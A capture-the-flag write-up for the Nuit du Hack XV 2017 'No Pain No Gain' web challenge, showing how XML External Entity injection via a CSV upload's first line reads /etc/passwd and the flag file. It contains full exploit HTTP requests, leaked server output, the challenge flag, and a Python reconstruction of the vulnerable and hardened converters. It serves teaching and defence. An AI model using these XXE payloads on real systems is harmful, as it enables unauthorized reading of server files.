Nuit du Hack XV – 2017 – No Pain No Gain

Here is how to solve the “No Pain No Gain” challenge from the Nuit du Hack XV CTF qualifications, held from the 31st of March 2017 to the 1st of April 2017:

Nuit du Hack XV - No Pain No Gain

As you can see, you need to upload a CSV file formatted exactly as the Web Application specifies (see the picture above).

First of all, create your CSV file, then upload it and check the result you get back from the Web Application.

A table should appear with all the information from the CSV file. If you put in something unexpected, you get an error saying the Web Application cannot convert your CSV to XML (a good hint!).

I tried injecting payloads into the fields (id, name, email) with Burp, as below:

POST /index.php HTTP/1.1
Host: nopainnogain.quals.nuitduhack.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://nopainnogain.quals.nuitduhack.com/index.php
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------13765813638035171811862571275
Content-Length: 433

-----------------------------13765813638035171811862571275
Content-Disposition: form-data; name="file"; filename="upload.csv"
Content-Type: text/csv

<!-- Invitations -->
id,name,email
a,&lt;,z
-----------------------------13765813638035171811862571275
Content-Disposition: form-data; name="submit"

Submit Query
-----------------------------13765813638035171811862571275--

I used the HTML entity “&lt;” (it means “<”).

After that, I got a nice picture of Mario as shown below:

Nuit du Hack XV - No Pain No Gain - Mario

Web Application response:

  <script>alert('Thank You Mario! But Our Princess is in Another Castle!')</script>
  <center>
    <img src='thankyou.png' height='450' width='500'>
  </center>

I downloaded the image and analysed it for steganography, but found nothing there. I then continued investigating code injection in the fields (id, name, email) with other HTML entities, but again nothing.

After that, I looked at the first line of the CSV and replaced “Invitations” with something else; it was accepted without errors, which suggested that the first line is passed straight into the generated XML. So I tried an XML injection:

POST /index.php HTTP/1.1
Host: nopainnogain.quals.nuitduhack.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://nopainnogain.quals.nuitduhack.com/index.php
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------13765813638035171811862571275
Content-Length: 434

-----------------------------13765813638035171811862571275
Content-Disposition: form-data; name="file"; filename="upload.csv"
Content-Type: text/csv

<!DOCTYPE warren [ <!ENTITY var SYSTEM "test" > ]>
id,name,email
a,&var;,z
-----------------------------13765813638035171811862571275
Content-Disposition: form-data; name="submit"

Submit Query
-----------------------------13765813638035171811862571275--

I got the value “test” back exactly where “&var;” was located. This means the parser resolves entities declared in an attacker-supplied DTD: we have an XXE (XML External Entity) injection!
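To make the root cause concrete, here is an added example (my own Python reconstruction, not the challenge's PHP code, which I never saw): a converter that copies the first CSV line into the XML prolog and embeds field values unescaped, next to a hardened version that drops the user-controlled prolog, escapes every field, and refuses any document carrying a DTD before it reaches the parser. The element names, the `build_xml_*` / `parse_upload` functions and the two sample uploads are all my assumptions, constructed to mirror the requests above.

```python
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Constructed sample uploads (not captured from the challenge server).
BENIGN_CSV = "<!-- Invitations -->\nid,name,email\na,<b>,z\n"
MALICIOUS_CSV = (
    '<!DOCTYPE warren [ <!ENTITY var SYSTEM "file:///etc/passwd" > ]>\n'
    "id,name,email\na,&var;,z\n"
)

EXPECTED_HEADER = ["id", "name", "email"]
# Any DTD at all is rejected; a legitimate invitation list never needs one.
DTD_RE = re.compile(r"<!DOCTYPE|<!ENTITY", re.IGNORECASE)


def build_xml_unsafe(csv_text: str) -> str:
    """Hypothetical reconstruction of the flaw the write-up exposes:
    line 1 of the CSV becomes the XML prolog verbatim and the field values
    are spliced in unescaped, so the uploader controls both DTD and markup."""
    lines = csv_text.strip().splitlines()
    prolog, header, rows = lines[0], lines[1].split(","), lines[2:]
    body = "".join(
        "<row>" + "".join(f"<{h}>{v}</{h}>" for h, v in zip(header, r.split(",")))
        + "</row>"
        for r in rows
    )
    return f"{prolog}<invitations>{body}</invitations>"


def build_xml_safe(csv_text: str) -> str:
    """Hardened converter: the first line is never copied into the document,
    the header must match the expected one, and every value is escaped."""
    lines = csv_text.strip().splitlines()
    if len(lines) < 2:
        raise ValueError("CSV too short")
    header = lines[1].split(",")  # a real service would use the csv module
    if header != EXPECTED_HEADER:
        raise ValueError(f"unexpected header: {header}")
    rows = []
    for line in lines[2:]:
        fields = line.split(",")
        if len(fields) != len(EXPECTED_HEADER):
            raise ValueError(f"wrong field count in {line!r}")
        # escape() turns '<', '>' and '&' into &lt; &gt; &amp;, so an
        # injected "&var;" is stored as inert text, not an entity reference.
        cells = "".join(f"<{h}>{escape(v)}</{h}>" for h, v in zip(EXPECTED_HEADER, fields))
        rows.append(f"<row>{cells}</row>")
    return "<invitations>" + "".join(rows) + "</invitations>"


def parse_upload(xml_text: str) -> list[dict[str, str]]:
    """Defence in depth: refuse DTDs outright, then parse and return the rows."""
    if DTD_RE.search(xml_text):
        raise ValueError("DTD / entity declarations are not allowed")
    root = ET.fromstring(xml_text)
    return [{child.tag: child.text or "" for child in row} for row in root.findall("row")]


if __name__ == "__main__":
    print(parse_upload(build_xml_safe(BENIGN_CSV)))      # name comes back as "<b>"
    print(parse_upload(build_xml_safe(MALICIOUS_CSV)))   # name comes back as the literal "&var;"
    try:
        parse_upload(build_xml_unsafe(MALICIOUS_CSV))
    except ValueError as exc:
        print("rejected:", exc)
```

The DTD check is a guard, not a substitute for parser configuration: the parser itself must be configured not to load external entities. On the PHP side (the challenge served index.php), that means never passing LIBXML_NOENT and, on PHP releases before 8.0, calling libxml_disable_entity_loader(true) before parsing untrusted XML.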

The next request fetched the “/etc/passwd” file:

Request:

POST /index.php HTTP/1.1
Host: nopainnogain.quals.nuitduhack.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://nopainnogain.quals.nuitduhack.com/index.php
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------13765813638035171811862571275
Content-Length: 434

-----------------------------13765813638035171811862571275
Content-Disposition: form-data; name="file"; filename="upload.csv"
Content-Type: text/csv

<!DOCTYPE warren [ <!ENTITY var SYSTEM "file:///etc/passwd" > ]>
id,name,email
a,&var;,z
-----------------------------13765813638035171811862571275
Content-Disposition: form-data; name="submit"

Submit Query
-----------------------------13765813638035171811862571275--

Web Application response:

...
<table style='width:100%'>
<tr>
<th>ID</th>
<th>Name</th>
<th>Email</th>
</tr>
<tr>
<td>a</td>
<td>
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
flag:x:1000:1000::/home/flag:/bin/sh</td>
<td>z</td>
</tr>
</table>

As you can see, there is a “flag” user whose home directory is “/home/flag”. I tried to read the flag from “/home/flag/flag”, and it worked:

Request:

POST /index.php HTTP/1.1
Host: nopainnogain.quals.nuitduhack.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://nopainnogain.quals.nuitduhack.com/index.php
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------13765813638035171811862571275
Content-Length: 438

-----------------------------13765813638035171811862571275
Content-Disposition: form-data; name="file"; filename="upload.csv"
Content-Type: text/csv

<!DOCTYPE warren [ <!ENTITY var SYSTEM "file:///home/flag/flag" > ]>
id,name,email
a,&var;,z
-----------------------------13765813638035171811862571275
Content-Disposition: form-data; name="submit"

Submit Query
-----------------------------13765813638035171811862571275--

Web Application response:

<table style='width:100%'>
<tr>
<th>ID</th>
<th>Name</th>
<th>Email</th>
</tr>
<tr>
<td>a</td>
<td>NDH{U3VwZXIgTWFyaW8gQnJvcw0K44K544O844OR44O844Oe44Oq44Kq44OW44Op44K244O844K6DQpTxatwxIEgTWFyaW8gQnVyYXrEgXp1DQrYs9mI2KjYsdmF2KfYsdmK2Yg=}</td>
<td>z</td>
</tr>
</table>

I got the flag!

NDH{U3VwZXIgTWFyaW8gQnJvcw0K44K544O844OR44O844Oe44Oq44Kq44OW44Op44K244O844K6DQpTxatwxIEgTWFyaW8gQnVyYXrEgXp1DQrYs9mI2KjYsdmF2KfYsdmK2Yg=}

Do not hesitate to leave me comments! 🙂
